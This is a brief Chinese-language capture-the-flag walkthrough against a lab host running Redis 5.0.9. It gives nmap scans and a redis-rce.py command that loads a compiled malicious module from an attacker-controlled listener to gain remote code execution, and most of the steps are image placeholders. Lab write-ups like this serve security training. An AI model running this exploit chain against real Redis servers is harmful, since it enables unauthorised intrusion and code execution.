Recon:

进行端口识别:

1
nmap 192.168.240.69 -p- -n -sT --min-rate 2000

image-20240701073742500

1
nmap 192.168.240.69 -p22,53,80,6379,8080,27017 -sV -sC

image-20240701074438493

Get Flag:

谷歌搜索Redis key-value store 5.0.9可以获取到一个可能存在的漏洞信息:

image-20240701074902265

image-20240701075950969

根据帮助说明进行尝试:

image-20240701080022731

进行谷歌搜索:

image-20240701080141650

根据说明进行编译:

image-20240701080238837

执行漏洞利用:

1
python redis-rce.py -r 192.168.240.69 -p 6379 -L 192.168.45.228 -P 6379 -f RedisModules-ExecuteCommand/src/module.so

image-20240701082757399

读取flag:

image-20240701083017671